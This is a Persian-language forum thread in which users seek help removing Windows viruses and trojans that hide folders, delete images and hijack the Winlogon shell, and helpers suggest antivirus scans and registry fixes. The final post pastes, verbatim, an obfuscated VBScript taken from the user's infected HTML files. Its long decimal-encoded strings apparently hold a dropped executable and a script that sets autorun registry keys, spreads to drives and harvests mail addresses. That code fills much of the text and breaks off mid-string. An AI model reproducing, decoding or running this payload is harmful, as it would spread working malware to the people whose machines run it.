در ضمن این تروجان فایلهای jpg و zip را پاک میکنه ولی فایلهای بزرگ زیپ رو پاک نمی کنه
همچنین فولدرهای بزرگ رو وقتی واردش میشی و میای بیرون ، اونا رو هم مخفی می کنه.
در ضمن مک آفی اونو نمیشناسه
اون فولدر services را هم نمیذاره کپی بگیرم و آپلود کنم
nod32 وقتی run میشه میگه این فایل services.exe را باید پاک کنی و بعد میگه باید سیستم reboot بشه
ولی بعد از رستارت باز همان آش و ...
من قبل از این ویروس :31: بودم ولی الان سه هفته است که :41: شدم

McAfee has detected a potentially unauthorized change to your computer.

Details
SystemGuard Name: Winlogon Shell
Change: Registry Modified

More Info
SystemGuard Description: The Winlogon Shell is automatically loaded when a user logs on to Windows. The Shell is the main User Interface (UI) used to manage Windows and is usually Windows Explorer (explorer.exe). However, the Windows Shell can be easily changed to point to another program. If this occurs, a program other than the Windows Shell is launched every time a user logs on.

Process: F:\game save.exe
Affected Items: C:\WINDOWS\explorer.exe, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell

If you did not expect this change, McAfee recommends that you block it. If you expected this change, allow it.

این پیغامیه که وقتی وارد درایو f و فولدر game save شدم داد و دو گزینه allow change و block change
را داد .
در ضمن این تروجان فایلهای jpg و zip را پاک میکنه ولی فایلهای بزرگ زیپ رو پاک نمی کنه
همچنین فولدرهای بزرگ رو وقتی واردش میشی و میای بیرون ، اونا رو هم مخفی می کنه.
در ضمن مک آفی اونو نمیشناسه
اون فولدر services را هم نمیذاره کپی بگیرم و آپلود کنم
nod32 وقتی run میشه میگه این فایل services.exe را باید پاک کنی و بعد میگه باید سیستم reboot بشه
ولی بعد از رستارت باز همان آش و ...
من قبل از این ویروس :31: بودم ولی الان سه هفته است که :41: شدم

سلام دوست عزیز

خوشبختانه مک آفی کمک بیشتری کرده است اولا اگر قبلا System Restore را غیر فعال نکرده ای آن را غیر فعال

کن بعد اگر دوستی داری که کاسپرسکی نسخه 6 روی کامپیوترش نصب است از او کمک بگیر : دو کار می توانی

بکنی هاردت را به مادربورد او وصل کنی و با استفاده از کاسپرسکی آپدیت شده هاردت را اسکن کنی و یا در صورت

امکان پذیر نبودن این امر با استفاده از کاسپرسکی موجود روی سیستم او یک Rescue CD درست کن و بعد

سیستمت را با آن بوت کن و بگذار سیستمت را به طور کامل اسکن کند و هرچه را پیدا کرد حتی اگر فایلی ضروری

بود پاک کن .بعد چند کار دیگر هم باید بکنی که اگر این کارها را کردی بگو تا آنها را هم بگویم.

درضمن برای آپلود این فایل لازم نیست آن را کپی کنی از آن یک فایل فشرده درست کن و بعد آپلود کن .

سلام
با توجه به گفته های شما یه احتمال هم این میتونه باشه که سیستم شما به یه برنامه Spy یا چیز مثل اون گرفتار شده باشه.با یه Spyware سیستم را چک کنید.
درسته این برنامه ها شاید نتوانند کارهای مخرب مثل پاک کردن فایلها انجام بدن ولی میتوانند عامل تحریک کننده یه ویروس((دستور Delete کننده یا هرچیزی مثل اون)) باشن.
احتمال داره یه برنامه کنترلی ساده مثل یه Router به برنامه مخرب دستور میده . که آنتی ویروسها هم بهش مشکوک نمیشن. البته این فقط یه احتماله .

من يه مدتي هست كه اين ويروس Navid new virus 2006 كلافم كرده هر كاريش ميكنم بعد يه ريست ميكنم دوباره فعال ميشه
ميشه راهنمايي كنيد كه چه جوري غير فعالش كنم؟:41: :41: :41: :41: :41: :41: :41:
آيا آنتي ويروس خاصي هم داره ؟
نورتون و مك آفي و پاندا هيچ كودوم نشناختنش !!!!!!!!!!

سلام دوست عزیز

فایل زیر راداونلود کن و آن را اجرا کن.( البته اگر ویروس مزبور اجازه اجرای آن را بدهد ) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام ...

فایل فشرده ی فوق ، حاوی یک ویرس با نام W32/Generic.worm!p2p می باشد !!! :18:

من يه مدتي هست كه اين ويروس Navid new virus 2006 كلافم كرده هر كاريش ميكنم بعد يه ريست ميكنم دوباره فعال ميشه
ميشه راهنمايي كنيد كه چه جوري غير فعالش كنم؟:41: :41: :41: :41: :41: :41: :41:
آيا آنتي ويروس خاصي هم داره ؟
نورتون و مك آفي و پاندا هيچ كودوم نشناختنش !!!!!!!!!!
سلام ...

از برنامه ی زیر استفاده کن ، شاید بتونه مشکلت رو بر طرف کنه .

موفق باشید .
.
.
.

سلام
ممنون که این همه کمکم کردید :11:
nod 32 رو آپدیت کردم ( قبلا اشتباه آپدیت می کردم ) و اونو اینجوری کرد :24:
این تروجان پدر سگ تقریبا 40 تا فایل exe را مورد حمله قرار داده بود که همه رو پاک کردم و
با نصب مجدد ویندوز اینجوری شدم :26:
حالا فولدر های بزرگ رو نمیاره و تمام درایو ها خالیه.
وقتی در قسمت ادرس بار اسم فولدر رو می نویسم میاد ولی وقتی بک میزنم بازم فولدرو نشون نمی ده
قبلا در گیر و داد ویروسی بودن سیستم با مک افی اگه فولدری حتی اگه ویروسی شده بود و هدن شده بود،
اگه واردش میشدم و بک میزدم اونو میاورد و من تمام فولدرهای مخفی رو اینجوری آوردم
ولی حالا یوخ
لطفا کمکم کنید تا اینو هم درست کنم (البته اگر خودم پیدا نکنم ) شوخی کردم ....
دوستانی هم که با این این تروجان مشکل دارند (شماره حساب میدم و ... ) بعد میگم nod32 رو اپدیت کنند تا
اونو :thumbsdow
:16:

سلام ...

فایل فشرده ی فوق ، حاوی یک ویرس با نام W32/Generic.worm!p2p می باشد !!! :18:

سلام دوست من

این یک مثبت کاذب است این برنامه معروفترین برنامه برای اسکن سیستم از نظر آلودگی است می توانید نتیجه اسکن

آن با سایر آنتی ویروسها را هم ببینید. مشکل از آنتی ویروس شما است شما از یک آنتی ویروس با هوریستیک پارانویید (

و یا شاید ابتدایی ) استفاده می کنید که فایلهای بی ضرر را هم به صورت فایلهای آلوده شناسایی می کند .آنتی ویروس

شما احتمالا هر فایل پک شده ای را بدون توجه به محتوای آن به صورت ویروس شناسایی می کند( در این مورد فایل از UPX

استفاده کرده است ).

bb جان منم همین ویروس لعنتی رو دیروز گرفتم! لعنتی خیلی خیلی زرنگه! تمام عکسامو پاک کرده! از عکسای خانوادگی تا عکسایی که از نت گرفته بودم! اما خوب! کور خونده! من دم هرچی ویروسه قیچی کردم!

این ویروسه فولدرا رو به حالت سیستم فایل تبدیل میکنه که حتی رو حالت Show hidden files نشون داده نمیشن.......... باید Hide protected operating file system رو تیکشو برداشت تا درست بشه........ البته سریع ویروسه تیک بر میگردونه! یه شورتکات درست میکنه واسه هر فولدر که متوجه نشی اوضاع از چه قراره.............

من اول ویندوزو عوض کردم................. بعد تیک Hide protected operating file system رو برداشتم............. بعد هم تیک Hide extensions for known file types هم برداشتم تا پسوند فولدرای جعلی دیده بشه.......... نشستم یکی یکی دلیتشون کردم........... بعد نرم افزار Recover My Files رو نصب کردم........... خوشبختانه تونستم تمام عکسای دلیت شدمو به راحتی برگردونم...............

امیدوارم واسه شما هم دیر نشده باشه!

من بد بختم آخر دانلود كنم يا نه ؟ اين ويروس منو پير كرده !
كمك

سلام دوست من

این یک مثبت کاذب است این برنامه معروفترین برنامه برای اسکن سیستم از نظر آلودگی است می توانید نتیجه اسکن

آن با سایر آنتی ویروسها را هم ببینید. مشکل از آنتی ویروس شما است شما از یک آنتی ویروس با هوریستیک پارانویید (

و یا شاید ابتدایی ) استفاده می کنید که فایلهای بی ضرر را هم به صورت فایلهای آلوده شناسایی می کند .آنتی ویروس

شما احتمالا هر فایل پک شده ای را بدون توجه به محتوای آن به صورت ویروس شناسایی می کند( در این مورد فایل از UPX

استفاده کرده است ).
سلام عزیزم ...
ممنون از توضیحاتتون .
من McAfee VirusScan Enterprise 8.0.0 روی سیستمم نصبه ...
عجیبه !
من حتی اون برنامه رو Unpack هم کردم ، اما باز هم آنتی ویروسم اون رو با نام ویروس W32/Generic.worm!p2p معرفی کرد !
ولی در تایید گفته های شما باید بگم که NOD32 هنگام Scan این فایل ، هیچ عکس العملی نشون نداد !
موفق باشید .

من بد بختم آخر دانلود كنم يا نه ؟ اين ويروس منو پير كرده !
كمك
سلام به شما کاربر محترم .
آره !
دانلود کن ...
راستی !
فایل ANV رو دانلود کردی ؟

سلام
همیشه از امنیت سیستمم خیالم راحت بود تا اینکه یه روز که zone lab رو غیر فعال کرده بودم و فقط nod کار میکرد از یه حافظه فلش فایلی اجرا شد که البته nod تشخیص داد اما یه خورده دیر...
در مورد این ویروس هیچ process مشکوکی رو تو task manager , win task , windows defender ندیدم.
این ویروس نتیجه اجرای فایل های exe رو با پنجره open with نشون میده
یعنی مثلا اگه شما یه فایل Exe رو اجرا کنید فقط پتجره open with باز میشه
جالبش اینه که nod فایل رو پاک کردش اما هنوزم تو سیسم کارش رو میکنه
تو startup هم چیز مشکوکی نیست .
جالب اینه که حتی خواستم فایل هلی مخفی رو هم ببینم و وقتی رفتم به folder optoion و show hidden file رو تیک میدادم و ok میکردم نه فایل های مخفی نشون داده می شد و وقتی هم بر میگشتم به folder option تیک show hidden file برداشته شده بود .
فکر کنم این اطلاعات واسه قاتلین ویروس کافی باشه .

پیشاپیش از لطفتون سپاسگزارم .

سلام
همیشه از امنیت سیستمم خیالم راحت بود تا اینکه یه روز که zone lab رو غیر فعال کرده بودم و فقط nod کار میکرد از یه حافظه فلش فایلی اجرا شد که البته nod تشخیص داد اما یه خورده دیر...
در مورد این ویروس هیچ process مشکوکی رو تو task manager , win task , windows defender ندیدم.
این ویروس نتیجه اجرای فایل های exe رو با پنجره open with نشون میده
یعنی مثلا اگه شما یه فایل Exe رو اجرا کنید فقط پتجره open with باز میشه
جالبش اینه که nod فایل رو پاک کردش اما هنوزم تو سیسم کارش رو میکنه
تو startup هم چیز مشکوکی نیست .
جالب اینه که حتی خواستم فایل هلی مخفی رو هم ببینم و وقتی رفتم به folder optoion و show hidden file رو تیک میدادم و ok میکردم نه فایل های مخفی نشون داده می شد و وقتی هم بر میگشتم به folder option تیک show hidden file برداشته شده بود .
فکر کنم این اطلاعات واسه قاتلین ویروس کافی باشه .

پیشاپیش از لطفتون سپاسگزارم .

سلام
ممنون که این همه کمکم کردید :11:
nod 32 رو آپدیت کردم ( قبلا اشتباه آپدیت می کردم ) و اونو اینجوری کرد :24:
این تروجان پدر سگ تقریبا 40 تا فایل exe را مورد حمله قرار داده بود که همه رو پاک کردم و
با نصب مجدد ویندوز اینجوری شدم :26:
حالا فولدر های بزرگ رو نمیاره و تمام درایو ها خالیه.
وقتی در قسمت ادرس بار اسم فولدر رو می نویسم میاد ولی وقتی بک میزنم بازم فولدرو نشون نمی ده
قبلا در گیر و داد ویروسی بودن سیستم با مک افی اگه فولدری حتی اگه ویروسی شده بود و هدن شده بود،
اگه واردش میشدم و بک میزدم اونو میاورد و من تمام فولدرهای مخفی رو اینجوری آوردم
ولی حالا یوخ
لطفا کمکم کنید تا اینو هم درست کنم (البته اگر خودم پیدا نکنم ) شوخی کردم ....
دوستانی هم که با این این تروجان مشکل دارند (شماره حساب میدم و ... ) بعد میگم nod32 رو اپدیت کنند تا
اونو :thumbsdow
:16:

سلام دوست عزیز

خوشحالم که مشکلتان حل شد برای حل مشکل اخیرتان کمی باید رجیستری را دستکاری کنید .پس از باز کردن

Registery Editor به آدرس زیر بروید :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell

روی کلید Shell مطابق شکل زیر دوبار کلیک کنید و در پنجره باز شده در محل نشان داده شده Explorer.exe

را وارد کنید واز رجیستری خارج شوید ببینید مشکلتان حل می شود یا نه ؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

منتقل شد....

ANV رو دانلود كردم آقا دمت گرم ... ممنون
ولي هنوز فايل هاي html مشكل داره ولي اون فايل Js. از سيستم رفت و ريست ميكنم ديگه نمياد . تشكر
پير شي الهي عزيز

راستي مشكل فايل هاي html سيستم اينه كه داخل فرانت پيج هم هست !

------------------------------------------------------

<script language=vbscript>
on error resume next
fileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 40790000000000000000000000000000000000000000000000 00080069000000076001003000081115047069000000000000 00000000000022400001500101100100501200000200000000 00300060000000000000000070170000000000160000000000 32000000000000064000000016000000000002000000004000 00000000400000000000400000000000000000000000008000 60000000040000001390390000000020000000000000000160 00000016000000000000016000000016000000000000000000 01600000000000000000000000000000000006803200000010 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00003200000006800000000000000000000000000000000000 00000000000000000000000000000000000000000000000461 16101120116000000000240001000000000016000000000002 00000000000400000000000000000000000000000000000000 00000320000000960461141000971160970000002500010000 00000032000000000002000000000006000000000000000000 00000000000000000000000006400000006404610009711609 70000000001280270060000000480000000000020000000000 08000000000000000000000000000000000000000000064000 00019200000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000001060001060001060001060011060 00232207001000000163112075070000106000104000000000 12810600010600010404104806400025505311207507000023 21810010000001631160750700001041200750700001041280 26006000104240048064000255053116075070000232156001 00000010400400100000010412407507000023223100000000 01040280480640001041240750700002322440000000001040 00016000000104088048064000104124075070000232202000 00000016322404806400010600010422804806400025505312 00750700001042400480640002550532240480640002321740 00000000255053224048064000232145000000000255053112 07507000023203200100000025505311607507000023202100 10000001060051060001060001041240750700001060001060 00232073000000000195085139236131196228106000106000 10600014106922808023206300000000001119211602014106 92280802320620000000001410692280802320350000000002 35217201195104000016064000104224147004000106000106 00023202400000000023218525525525519525503702003206 40002550370400320640002550370360320640002550370320 32064000255037028032064000255037000032064000255037 01203206400025503700803206400025503700403206400020 42042042042042042042042042040851392360872551170082 32036000000000139125008139077012003248051210051192 13800401013600405813119400113219211724309513906900 82011940080002042042040851392361390690081312320041 31192004128056000116048128120001000116032128120002 00011601612812000300011723004306900813119200320119 40040000430690081311920022011940040000430690081311 92001201194004000043069008201194004000255037060032 06400025503704803206400025503705203206400025503705 60320640000000000000000000000000000000000000000000 00000000086033000000134033000000122033000000100033 00000000000000000023603200000000000000000005403300 00000420330000000280330000000080330000000000000000 00182033000000198033000000218033000000160033000000 00000000000018803200000000000000000000000000000025 20320000000200320000001960320000000000000000000000 00000000074033000000028032000000168032000000000000 00000000000000000014603300000000003200000021603200 00000000000000000000000000002380330000000480320000 00000000000000000000000000000000000000000000000000 00000000000008603300000013403300000012203300000010 00330000000000000000002360320000000000000000000540 33000000042033000000028033000000008033000000000000 00000018203300000019803300000021803300000016003300 00000000000000001030000831041011081080691201010991 17116101065000115104101108108051050046100108108000 14000006810511511209711609910407710111511509710310 10650000000250010711011160771011151150971031010650 00023002083101116084105109101114000000066002084114 09711011510809711610107710111511509710310100000011 71151011140510500461001081080000000260000671081111 15101072097110100108101000060001071101116083121115 11610110906810511410109911611111412106500020200107 91121011100701051081010000001580020871141051161010 70105108101000107101114110101108051050046100108108 00000010500007311011610111411010111606710811111510 10720971101001081010001340000731101161011141101011 16079112101110065000135000073110116101114110101116 07911210111008511410806500000014200007311011610111 41101011160821010971000701051081010000001191051101 05110101116046100108108000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000920831211151161011091 15046101120101000104116116112058047047104049046114 10511211909712104609911110904710011410109710910409 70991070470720470780971181051001040970991070461011 20101000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000000000000"
filevbs1="03907809711810510003211010111903211810511411711503 20500480480540400490510550530460490410130101111100 32101114114111114032114101115117109101032110101120 11601301010010510903210210510810110411610904411512 11150441211140130101021051081011041161090490610340 49048048049048053049048057048051050049049053049050 04904904905304804905104804904804805605104904804904 90490540480510500490480480490480500480510500480540 49048051050049048048049049049048057057049049055049 04805704904804904904904804904905404805205404805705 70490490520490480490480570550490490540490480490480 54057049048056049048049049048057049048049049049048 04904905404805204804805105204904904904805705604904 80540490480490480570570490490540480510520480520490 48049051048049048049048048049048050048052054049049 05304904804904904905404805405304904905404904905404 90490520490480530480570560490490550490490540490480 49048051050048051052048057057049048056048057055049 04905304904905304904805304904804804805105204805205 20480510500480510520480570570490480560490490530490 48053049048048048053056048054054048054056048053055 04805305204805405504805305104805305104805305204805 20530480530520480530510480540530480530490480520530 48052057048052057048054056048052056048052053048053 05504805305404805304904805405304805205304805205604 80520560480540550480520560480530500480550480480540 55048053048048053055048054057048053049048053052048 05105004805105204804905104804904804904905304904804 90490490540480510500490480500490490530490490490480 51050048054049048051050049048048049048050048052054 04805705704904905204904804904805705504904905404904 80490490490490480570560490480540490480490480570570 49049054048052048048051052048056051048057057049049 05204904805304904905004904905404904805304904904804 90480510480520540480550480490480530490480560490480 49048056051049050049049049053049049054049048049049 04805704805505704805705604904805404904804904805705 70490490540480510520480520520480510520480510520480 52049048049051048049048049049053049048049049049054 04805105004904905304805404904904804804904805004805 20540480540550490490520490480490480570550490490540 49048049048055057048057056049048054049048049048057 05704904905404805204804805105204805605104904805204 90480490490480560490480560480520540480540530490490 50049049050049048056049048053048057057048057055049 04905404904805304904904904904904804805205404805205 70480510520480520520480510520480510520480520490480 49051048049048049049053049048049049049054048051050 04904905204904804904805404904904804804904805004805 20540480570570490490520490480490480570550490490540 49048049049049049048057056049048054049048049048057 05704904905404805204804805105204904905704904905304 80570570490490520490480530490490500490490540480520 54049049053049048052049048049049048056049048056048 05105204805205204805105204805105204805204904804905 10480490480490490530490500490490490530480540490490 48050049049053049049049048052054048055049049048049 04904905404805605104904905004904804904805705704904 80530480570550490480560480550480490490490490480560 49048048049048049049049052048052048048052057048052 04904804905104804904804805504804904904904904905204 80510500480570550480510500480540490480510500480520 57048051050048056052049049049048051050048055054049 04804904904904804805204804904805004904805304904805 60490480490490490560480570560490490530480520570480 52049048051050048056051049049054049048049049049050 04805105004805304904804905104804904804904805004904 80530490480560490480490490490560480570560490490530 48053048048054049049048050049048053049048056049048 04904904905604805705604904905304805304804805105004 80510560480510500480570570490480520490490520480520 48049048057049048053049048048048052048049048050049 04805304904805604904804904904905604805705604904905 30480520570480520520480570550480520520480530490480 52049048052049048049051048049048049048053049048050 04805105004805705504805105004805404804805105004904 80560490480490490490480480520480490480500490480530 49048056049048049049048049049050048049048049048052 05704805204904805205104805205704805105004904905404 90480520490480490490490480480510500490480500490480 53049048056049048049049048049049050048049048049048 05304804805404904904805004904805304904805604904804 90490480490490500480490480490480530480480510500480 51056048051050048057057049048052049049052048052048 04904805704904805304904804804805204804904805004904 80530490480560490480490490480490490500480490480490 48052057048052052048057055048052052048053049048052 04904805204904804905104804904804904904804904804904 90500480490490540480490510480490480490480550490490 52048051050048054049048051050048056053048054055048 05705504904905304904804904805204804904905204904804 90480520540480560500490480490490480510480560500490 48049048057055049048048048052048048051052048055050 04805505304805405704805605704805705304805505404805 50570480540550480540530480550540480570530480550550 48054053048054055048055050048055051048055056048054 05704805705004805605104805505704805504804805605204 80560550480540530480560500480540570480570500480550 55049048053048057057049049052049049049049049053049 04904904904805004904905404805705004805605504904805 30490490480490480480490490490490490570490490530480 57050048054055049049055049049052049049052049048049 04904904804904905404805605404904804904904905204904 90530490480530490490490490490480480570500480560500 49049055049049048048057050048055055049048053048057 05704904905204904904904904905304904904904904805004 90490540480510500480560550490480530490490480490480 48049049049049049057049049053048051052048052049048 05204904804905104804904804904805004904905304904904 90480520540480540550490490520490480490480570550490 49054049048049048056052049048049049050048049049054 04805504804904805304904805604904804904805204804904 90530490500490490490530480510500480510560480510500 48051052048057050048056052048056051048056048048053 04904805304804805405704805205404805405604805505404 80550540480510520480520490480520540490490570490490 52049048053049049054049048049048051050049048050049 04805304904805604904804904904804904905004804904804 90480520570480490510480490480490480530490480500480 51050049049055048057057048057055049049053049048049 04805204804904805004904905304904904904805205404805 50480490480530490480560490480490480540570490500480 49048053049049053049049054049049053048052048049049 05304905004904904905304805105004805105604805105004 80510520480570500480550530490480490490490520490490 48049048049049048056048052054049048049049050048049 04804904805105204805204904805204904805404904805105 20480550480480540530480550540480560510480540570480 51052048051050049049049049049052048051050049048055 04904905204805404804805405004904905504805705704805 70550490490530490480490480520480490490530490500490 49049053048051050048051056048051050048051052048057 05004805505304805405704805605004805505604805405704 80550540480520540480540570480560560480540570480510 52048052049048051050049049054049048052049048049049 04904804804905104804904804904905204904804904805205 40490490520490480490490480510490490570490490520490 48053049049054049048049048051050048051052048055050 04805505304805405704805605704805705304805505404805 50570480540550480540530480550540480570530480550550 48054053048054055048055050048055051048055056048054 05704805705004805605104805505704805504804805605204 80560550480540530480560500480540570480570500480550 55049048053048057057049049052049049049049049053049 04904904904805004904905404805705004805605504904805 30490490480490480480490490490490490570490490530480 57050048054055049049055049049052049049052049048049 04904904804904905404805605404904804904904905204904 90530490480530490490490490490480480570500480560500 49049055049049048048057050048051052048051050048051 05604805105004805105204805505504904805304805705704 90490520490490490490490530490490490490480500490490 54048051050048056055049048053049049048049048048049 04904904904905704904905304805105204805105004805205 20490490530490500490490490530480510500480510560480 51052048057050048055053049048049049049052049049048 04904804904904805604805205404904804904905004804904 80490480510520480490510480490480490480500490490530 49049049048052054048054055049049052049048049048057 05504904905404904804904805605204904804904905004804 90490540480550480490480530490480560490480490480520 48049049053049050049049049053048051050048051056048 05105004805105204805705004805505304904804904904905 20490490480490480490490480560480520540490480490490 50048049048049048051052048052049048052054049049057 04904905204904805304904905404904804904805105004904 80500490480530490480560490480490490480490490500480 49048049048053048048049051048049048049049053048052 05404805505704904905004904804904904904804805105004 80520480490490530490500490490490530480510500480510 56048051050048051052048057050048055053049048049049 04905204904904804904804904904805604805205404904804 90490500480490480490480510520480520490480490510480 49048049048049049049048049048048048051050049048053 04904805004804905104804904804904805004904905304904 90490480520540480540550490490520490480490480570550 49049054049048049048056052049048049049050048049049 05404805504804904805304904805604904804904805204804 90490530490500490490490530480510500480510560480510 50048051052048057050048056052048056051048056048048 05304904805304804805605404805205404805405604805505 40480550540480510520480520490480520540490490570490 49052049048053049049054049048049048051050049048050 04904805304904805604904804904904905604805705604904 90530480520570480490510480490480490480530490480500 48051050049048050049049053049049049048052054049049 04904904905004904804904904904804904905404904804904 90500480490490540490480500490480530490480560490480 49048052048049049053049050049049049053048051050048 05105604805105004805105204805705004805605104905004 90490490530490490540490480490490480570490490560480 52054049048048049048056049048056048051052048052052 04805205704805204904805205404904905204904804904805 70550490480480480570550490480560490480560480540480 48054050048051052049049049049049048048051052048051 05004904905404904805204904804904904904804804905104 80490480490480500490490530490490490480520540480540 55049049052049048049048057055049049054049048049048 05605204904804904905004804904905404805504804904805 30490480560490480490480520480490490530490500490490 49053048051050048051056048051050048051052048057050 04805505304904804904904905204904904804904804904904 80560480520540490490560480570560490490530480510520 48052049048052054049049057049049052049048053049049 05404904804904805105004904805004904805304904805604 90480490490490560480570560490490530480530480480490 51048049048049049053048052054048055057049049050049 04804904904904804805105004805204804904905304905004 90490490530480510500480510560480510500480510520480 57050048055053049048049049049052049049048049048049 04904805604805205404904905604805705604904905304805 10520480520490480490510480490480490480490490490480 49048048048051050049048053049048050048049051048049 04804805404804805205504904905304805705704904905204 90480530490490500490490540480540500340130101151011 16032102115111061099114101097116101111098106101099 11604003411509911410511211610511010304610210510810 11151211151161011091110981061010991160340410130101 15101116032114101061099114101097116101111098106101 09911604003411911509911410511211604611510410110810 80340410130101151211150611021151110460711011160831 12101099105097108070111108100101114040049041013010 10211511104606711410109711610108410112011607010510 81010401151211150320380320340920831211151161011091 18046100108108034041046119114105116101032034111110 03401301010210510810110411610906103406011509911410 51121160321080971101031170971031010611180981150991 14105112116062034032038032118098099114108102032038 03203411111003210111411411111403211410111511710910 10321101011201160340320380321180980991141081020130 10102105108101104116109061102105108101104116109032 03803203410210510810110112010104906103403403403203 80321021151110461111121011101161011201161021051081 01040115121115032038032034092084083080051050069046 06807607603404404904104611410109710009710810803203 80320340340340340320380321180980991141081020130101 02105108101104116109061102105108101104116109032038 03203410210510810111809811504906103403403403203803 21021151110461111121011101161011201161021051081010 40115121115032038032034092084083080051050086046068 07607603404404904104611410109710009710810803203803 20340340340340320380321180980991141081020130100701 11114032097032061032049032084111032076101110040102 10510810110411610904904103208311610111203205101301 01021051081011041161090611021051081011041161090320 38032099104114040109105100040102105108101104116109 04904409704405104104101301011010112011601301011410 10461141011031191141051161010320340720750690890950 67085082082069078084095085083069082092083111102116 11909711410109207710509911411111511110211609208710 51101001111191150920671171141141011101160861011141 15105111110092082117110092034032038032034077105099 11411111511110211603208710511010011111911503403204 41151211150320380340920751011141101011080461180981 15034013010114101046114101103119114105116101032034 07207506908909507607906706507609507706506707207307 80690920830790700840870650820690920771050991141111 15111102116092087105110100111119115092067117114114 10111011608610111411510511111009208211711009203403 20380320340771050991141111151111021160320871051101 00111119115034032044115121115032038034092075101114 11010110804610112010103401301012111406111410104608 21011030821010971000400340720750690890950670850820 82069078084095085083069082092083111102116119097114 10109212109710411111109211209710310111409208909710 41111110330320851151011140320730680340410130101151 16097114116013010083117098032115116097114116040041 01301011111003210111411411111403211410111511710910 10321101011201160130100701111140320690970991040321 00114049032073110032102115111046068114105118101115 01301007310203210011404904606811410511810108412111 21010320610320500320791140321001140490460681141051 18101084121112101032061032051032084104101110032102 10510810104903204010011404903203803203409203404105 80321021111081001011140490320401001140490320380320 34092034041013010078101120116013010115101110100109 09710510801301006911010003208311709801301008311709 80321021111081001011140490401001140490410130101111 10032101114114111114032114101115117109101032110101 12011601301007011111403206909709910403210211103207 31100321021151110460711011160701111081001011140401 00114049041046083117098070111108100101114115013010 10510203208506709711510104011410510310411604010211 10440500530410410610340890650720790790330920770690 83083069078071069082092080082079070073076069083034 03211610410111003212109710411111104010211104101301 01021051081010490320401021110410130101021111081001 01114049032040102111041013010078101120116013010069 11010003208311709801301008311709803210210510810104 90401021110410130101111100321011141141111140321141 01115117109101032110101120116013010070111114032069 09709910403210210503207311003210211511104607110111 60701111081001011140401021110410460701051081011150 13010110106032040102105041013010078101120116013010 06911010003208311709801301011511709803211010604010 21050410130101111100321011141141111140321141011151 17109101032110101120116013010101120116061085067097 11510104010211511104607110111606912011610111011510 51111100780971091010401021050410410130101051020321 01120116061034072084077034032111114032101120116061 03407208407707603403211111403210112011606103407208 40840340321161041011100130101051020321141051031041 16040102115111046111112101110116101120116102105108 10104010210504404904104611410109710009710810804410 81011100401021051081011041161090410410600621021051 08101104116109032116104101110013010102115111046111 11210111011610112011610210510810104010210504405604 10461191141051161010321180980991141081020320380321 02105108101104116109013010101110100032105102013010 10111010003210510201301010111010003211511709801301 01151170980321210971041111110401021111210490410130 10070111114032069097099104032102111121050032073110 03210211511104607110111607011110810010111404010211 11210490410460831170980701111081001011141150130101 09097105108097108108061109097105108097108108032038 03210211511104607110111607010510810107809710910104 01021111210500410320380320340641210971041111110460 99111109034032038032118098099114108102013010110101 12011601301010211511104609911410109711610111610112 01161021051081010401151211150320380320340921090971 05108046108111103034041046119114105116101032109097 10510809710810803203803203406907806803401301010211 51110460991141010971161011161011201161021051081010 40115121115032038032034092115101110100046108111103 03404104611911410511610103212111403203803203406412 10971041111110460991111090340130101011101000321151 17098013010115117098032115101110100109097105108040 04101301011111003210111411411111403211410111511710 91010321101011201160130101151011101001090611021151 11046111112101110116101120116102105108101040115121 11503203803203409211510111010004610811110303404404 90410461141010971000971081080130101151011160321090 97105108109061102115111046111112101110116101120116 10210510810104011512111503203803203409210909710510 80461081111030340440490410130101090971051080970611 09097105108109046114101097100108105110101013010119 